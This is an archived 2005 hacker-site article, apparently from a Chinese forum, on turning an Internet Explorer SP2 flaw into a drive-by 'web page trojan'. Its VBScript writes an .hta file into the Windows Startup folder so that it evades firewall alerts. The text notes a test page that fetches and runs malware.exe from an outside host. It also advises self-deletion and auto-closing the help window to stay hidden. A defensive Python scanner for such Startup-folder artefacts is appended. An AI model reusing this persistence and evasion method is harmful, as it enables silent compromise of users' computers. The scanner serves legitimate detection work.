📄 20053302254.htm

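📁 I did the artwork myself this time, so it may look ugly, but the main goal was to improve efficiency. This time everything is generated as static pages; only the link for viewing the list of latest articles is not generated, because I felt it was unnecessary and a waste of space, and it is a rarely used feature! This time I removed many features; this version mainly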
<HTML><HEAD><TITLE>Analysis of the Approach to Building a Windows XP SP2 Web Page Trojan-http://www.koyee.com</TITLE>
 <SCRIPT src="../../ips.asp"></SCRIPT>


<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META http-equiv=http://www.koyee.com content=no-cache>
<META content=可以网络在线,ASP技术,.NET技术,delphi技术,JSP技术,VB技术! name=KEYWORDS>
<STYLE type=text/css>
BODY {
	BACKGROUND-IMAGE: url(images/webtop_bg3.gif); MARGIN: 0px
}
.style2 {
	FONT-SIZE: 12px
}
BODY {
	FONT-SIZE: 12px;
	COLOR: #333333;
	background-image: url();
}
TD {
	FONT-SIZE: 12px; COLOR: #333333
}
TH {
	FONT-SIZE: 12px; COLOR: #333333
}
A:link {
	COLOR: #333333; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
A:visited {
	COLOR: #cc3399; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
A:hover {
	COLOR: #cc66ff; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
A:active {
	COLOR: #ff9999; FONT-STYLE: normal; FONT-FAMILY: "宋体"; TEXT-DECORATION: none
}
.style4 {color: #FFFFFF}
.style5 {color: #000000}
.style6 {color: #FF0000}
.style7 {
	color: #FF0000;
	font-size: 16px;
	font-weight: bold;
}
</STYLE></head>
<script language="JavaScript">
var timerID = null;
var timerRunning = false;
function stopclock (){
if(timerRunning)
clearTimeout(timerID);
timerRunning = false;}
function startclock () {
stopclock();
showtime();}
function showtime () {
var now = new Date();
var year = now.getFullYear();
var month = now.getMonth()+1;
var day = now.getDate();
var hours = now.getHours();
var minutes = now.getMinutes();
var seconds = now.getSeconds()
var timeValue =year +"年"
timeValue += month+"月"
timeValue += day+"日 "
timeValue += "" +((hours >= 12) ? "下午 " : "上午 " )
timeValue += ((hours >12) ? hours -12 :hours)
timeValue += ((minutes < 10) ? ":0" : ":") + minutes
timeValue += ((seconds < 10) ? ":0" : ":") + seconds
liveclock.innerHTML=timeValue
timerID = setTimeout("showtime()",1000);
timerRunning = true;}

</script>
<body onload="startclock()">

<TABLE height=60 cellSpacing=0 cellPadding=0 width="800" 
            align=center border=0>
              <TBODY>
              <TR>
                <td background="../../images/webtop_bg.gif" width="332"><a target=blank href=http://wpa.qq.com/msgrd?V=1&Uin=61637663&Site=http://www.koyee.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:61637663:13 alt="If you need anything, call me, and call like crazy"></a></td>
                <td  background="../../images/webtop_bg.gif" width="455"><script  src="http://www.4.ads99.net/banner.php?userid=chdujian"></script></td>
              </TR></TBODY></TABLE>
			  <TABLE height=25 cellSpacing=0 cellPadding=0 width="800" 
            align=center border=0>
              <TBODY>
              <TR>
                <td background="../../images/22.gif">   &nbsp;<a href=../../index.htm>Home</a> | <a href=../../artical/69/1.htm>Programming</a> | <a href=../../artical/77/1.htm>IT Market</a> | <a href=../../artical/78/1.htm>Hacker Attack and Defense</a> | <a href=../../artical/79/1.htm>Computer Hardware</a></td>
 </TR></TBODY></TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td scope="col"><img src="http://www.asp315.com/study/images/index_r1_c1.jpg" width="800" height="83"></td>
  </tr>
</table>
			  <TABLE height=25 cellSpacing=0 cellPadding=0 width="800" 
            align=center border=0>
              <TBODY>
              <TR>
                <td width="624" bgcolor="#CCCCCC">Current location: <a href=../../index.htm>Home</a>--><a href=../../artical/78/1.htm>Hacker Attack and Defense</a>--><a href=../../artical/98/1.htm>Hacker Programming</a>-->Article view</td><td width="176" bgcolor="#CCCCCC"><span id="liveclock"></span></td>
 </TR></TBODY></TABLE>
<table width="800" height="406"  border="1" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
  <tr>
    <td width="166" height="200" valign="top" scope="col"><table width="100%" height="163"  border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td height="119" valign="top" scope="col"><table width="180" border="0" cellspacing="0" cellpadding="0" align="center">
  <form action="../../search.asp" method="post" name="searchLeftForm">
    <tr bgcolor="CAF6F4" align="center"> 
      <td height="25" bgcolor="#CC9900"><font color="#cc0000"><b>□ 
        Site Search □</b></font></td>
    </tr>
    <tr align="center"> 
      <td style="line-height:150%" height=60> Enter the search string:<br>
        <input name="search" type="text" class="button1" id="search" style="width:150">
        <select name="seaguan" size="1" class="button1" id="seaguan" style="width:150">
          <option value="">==&gt; General search &lt;==</option>
          <option value="title">Title</option>
          <option value="冰狐浪子">Author</option>
          <option value="artical">Content</option>
          <%call getNewsBoardTree()%>
        </select>
      </td>
    </tr>
    <tr align="center"> 
      <td> 
    
        <input type="SUBMIT" name="Action" value=" 查 询 " class="button2">
        <input type="RESET" name="Clear" value=" 重 写 " class="button2">
      </td>
    </tr>
    <tr align="center"> 
      <td height="10"></td>
    </tr>
  </form>
</table></td>
      </tr>
	  <tr>
	    <td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
	      <tr><td width="181" height="20" align="center" bgcolor="#CC9900">Latest articles in this category</td>
	      </tr>
		  <tr><td><a href=20054282302.htm target=_blank>ffffffffffffff</a></td></tr><tr><td><a href=20054123551.htm target=_blank>Using C to write code that extracts generic she</a></td></tr><tr><td><a href=200541232242.htm target=_blank>A Starting Point: Learning to Write Scripts Hands-On</a></td></tr><tr><td><a href=20053302254.htm target=_blank>Windows XP SP2</a></td></tr>
        </table></td>
	  </tr>
	  <tr>
	    <td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
	      <tr><td width="181" height="20" align="center" bgcolor="#CC9900">Popular articles in this category</td>
	      </tr>
		  <tr><td><a href=20053302254.htm target=_blank>Windows XP SP2</a></td></tr><tr><td><a href=20054123551.htm target=_blank>Using C to write code that extracts generic she</a></td></tr><tr><td><a href=20054282302.htm target=_blank>ffffffffffffff</a></td></tr><tr><td><a href=200541232242.htm target=_blank>A Starting Point: Learning to Write Scripts Hands-On</a></td></tr>
        </table></td>
	  </tr>
    </table></td>
    <td width="628" valign="top" scope="col"><table width="100%" border="0" align="center" cellspacing="0" cellpadding="5" bordercolordark="#FFFFFF" bordercolorlight="#000000" style="word-break:break-all;">
              <tr> 
                <td width="100%"> 

                </td>
              </tr>
              <tr> 
                <td width="100%"> 
                  <div align="center">
                    <p class="style7"><SPAN class=style1>Analysis of the Approach to Building a Windows XP SP2 Web Page Trojan</SPAN></p>
                    <hr size="1" color="#0a778b" width="100%">                    
                    Published: 2005-3-30  Views: <SCRIPT src="../../counter.asp?id=477"></SCRIPT>  Author: 冰狐浪子					
				  </div>
                </td>
              </tr>
           
              <tr> 
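                <td width="100%"><p class="style6">Vulnerability exploited:<BR>Microsoft Internet Explorer SP2 remote arbitrary command execution vulnerability<BR><BR>
Release date: 2004-12-23<BR><BR>
Affected systems:<BR>Microsoft Internet Explorer 6.0SP2<BR>&nbsp; &nbsp;- Microsoft Windows XP Professional SP2 <BR>&nbsp; &nbsp;- Microsoft Windows XP Home SP2<BR><BR>
By combining several flaws in Microsoft Internet Explorer, such as the Help ActiveX control issue, a remote attacker can exploit this vulnerability to execute arbitrary files without user interaction, resulting in malicious code execution.<BR><BR>
For details see: <A href="http://www.nsfocus.net/index.php?act=sec_bug&amp;do=view&amp;bug_id=7272&amp;keyword=">NSFOCUS<BR></A><BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Personal testing and analysis by 冰狐浪子<BR><BR>
&nbsp; &nbsp; Because the published test page targets the English version of Windows XP, the following directory must be created before testing on a Chinese system:<BR><BR>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\<BR><BR>
I tested with the supplied test page and found that, if a firewall is installed, it prompts that the application alg.exe is accessing the network. After choosing to allow it, I looked in the C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ directory and found that a file named "Microsoft Office.hta" had been written there. Running "Microsoft Office.hta" automatically downloaded a polished flame demo from http://freehost07.websamba.com/greyhats/malware.exe and ran it, and the malware.exe program appeared in the root of drive C: [it should be noted that the firewall raised no alert when Microsoft Office.hta was run]!<BR>
&nbsp; &nbsp;After looking at the code I found the reason for the firewall alert: the code in writehta.txt obtains the code to be written into Microsoft Office.hta by accessing a remote database. If we do not access the database and instead write the hta code directly into the script, the firewall alert is not triggered! Heh.<BR>
The method is to call ADODB.Recordset and write the required code as a record. I also found this code online; it is as follows:<BR><BR>
on error resume next<BR>set evanchik = CreateObject("ADODB.Recordset")<BR>&nbsp; With evanchik<BR>&nbsp; &nbsp; &nbsp; .Fields.Append "evanchik", 200, "3000"<BR>&nbsp; &nbsp; &nbsp; Call .Open<BR>&nbsp; &nbsp; &nbsp; Call .AddNew<BR>&nbsp; &nbsp; &nbsp; .Fields("evanchik").Value = "meaning less shit i had to put here"<BR>&nbsp; &nbsp; &nbsp; Call .AddNew<BR>&nbsp; &nbsp; &nbsp; .Fields("evanchik").Value = "此处写上要写到启动目录里的具体代码"<BR>&nbsp; &nbsp; &nbsp; Call .Update<BR>&nbsp; End With<BR>evanchik.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML<BR>evanchik.Close<BR><BR>
With the firewall problem solved, the next thing to look at is how to conceal the hta file running after boot. I will not write out the details; please refer to the exploit code for the earlier object vulnerability found online, which is what is now called the "non-flashing web page trojan" online! One point to note: the hta should preferably include a self-delete function, so that after running once it is not easily discovered later!<BR><BR>
In addition, a web page trojan built on this vulnerability opens a help file. If you find that undesirable, you can use the Close parameter of the help control, &lt;PARAM name="Command" value="Close" /&gt;, to close it automatically!<BR>
With that, an XP SP2 web page trojan is complete!<BR><BR>
Shortcomings:<BR>1. Because I did not find a way to run it directly and automatically, it can only be written to the Startup folder, and the hta file runs after the machine restarts; it is easily discovered and removed, so the trojan cannot be downloaded and run.<BR>2. Because a local htm or chm file must be called to obtain file-write permission, the file cannot be written when the system is not installed in the default location on drive C:!<BR><BR>
Finally, I wish everyone all the best in the new year and a good mood every day! I wish my guy friends luck in finding a pretty girl.</p>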
                  <p><img src="http://www.koyee.com/images/dgg.gif" height="70" width="587"> </p></td>
              </tr>
              <tr>
                <td width="628" bordercolor="0" class="font1"><p>
                  <hr size="1" color="#0a778b" width="100%">
				  <table><tr><td width="269" align="center">Previous:  <a href=../96/20053301583.htm title="Korean hackers attack five official Japanese websites">Korean hackers attack five official Japanese websites</a>  </td>
				  <td width="285" align="center">Next:  <a href=../90/200542823048.htm title=gew>gew</a></td>
				  </tr></table>

<hr size="1" color="#0a778b" width="100%">
<div align="right">  <a href="javascript:window.print()"><img src="../../images/printer.gif" width="16" height="14" border="0" align="absmiddle">Print this page</a> |  <a href="javascript:window.close()"><img src="../../images/close.gif" width="14" height="14" border="0" align="absmiddle">Close window</a> </div>
<p></p></td>
              </tr>
    </table></td>
  </tr>
</table>
<TABLE height=62 cellSpacing=0 cellPadding=0 width="800" 
            align=center background=../../images/webtop_bg.gif 
            border=0>
              <TBODY>
              <TR>
                <TD><div align="center" class="style4">Copyright @ 2004-2008&nbsp; http://www.koyee.com 可以网络在线 All rights reserved<br>
                    Company address: Nanchang, Jiangxi  Tel: 13879173467  Postal code: 330029<br>
                  email:chenxueyan9999@163.com</div></TD>
 </TR></TBODY></TABLE>
</BODY></HTML>
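
A defender's triage check for the artefact this article describes, added here as an example that is not part of the original article: it flags files in a Startup folder that carry a script-host extension or whose content is an ADO Recordset persisted as XML. The marker strings (ADO's rowset XML namespaces), the extension list and every function name are assumptions of this example, and the sample files are constructed, inert stand-ins.

```python
# Added example (not the article's code): triage one Startup folder.
import tempfile
from pathlib import Path

# Assumption: hypothetical local policy list of script-host extensions.
SCRIPT_EXTS = {".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf"}
# Assumption: XML namespaces ADO writes when a Recordset is persisted as XML.
ADO_MARKERS = (b"urn:schemas-microsoft-com:rowset", b"#rowsetschema")


def classify(name, data):
    """Return the reasons a Startup-folder file deserves a closer look."""
    reasons = []
    ext = Path(name).suffix.lower()
    # Drop NUL bytes so UTF-16 content still matches the ASCII markers.
    body = data.replace(b"\x00", b"").lower()
    if ext in SCRIPT_EXTS:
        reasons.append("script-host file in Startup (%s)" % ext)
    if all(marker in body for marker in ADO_MARKERS):
        reasons.append("ADO persisted-recordset XML")
    return reasons


def scan_startup(folder, max_bytes=65536):
    """Map file name -> reasons for every flagged file in one folder."""
    findings = {}
    for path in sorted(Path(folder).iterdir()):
        if path.is_file():
            with path.open("rb") as fh:
                reasons = classify(path.name, fh.read(max_bytes))
            if reasons:
                findings[path.name] = reasons
    return findings


def demo():
    """Scan constructed sample files (inert stand-ins, not real artefacts)."""
    ado_xml = (b"<xml xmlns:rs='urn:schemas-microsoft-com:rowset' "
               b"xmlns:z='#RowsetSchema'><z:row evanchik='placeholder'/></xml>")
    samples = {"Microsoft Office.hta": ado_xml, "notes.txt": b"plain text",
               "report.xml": ado_xml.decode().encode("utf-16")}
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            Path(tmp, name).write_bytes(data)
        return scan_startup(tmp)


if __name__ == "__main__":
    print(demo())
```

On a live host, `scan_startup` would be pointed at both the all-users and the per-user Startup folders.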
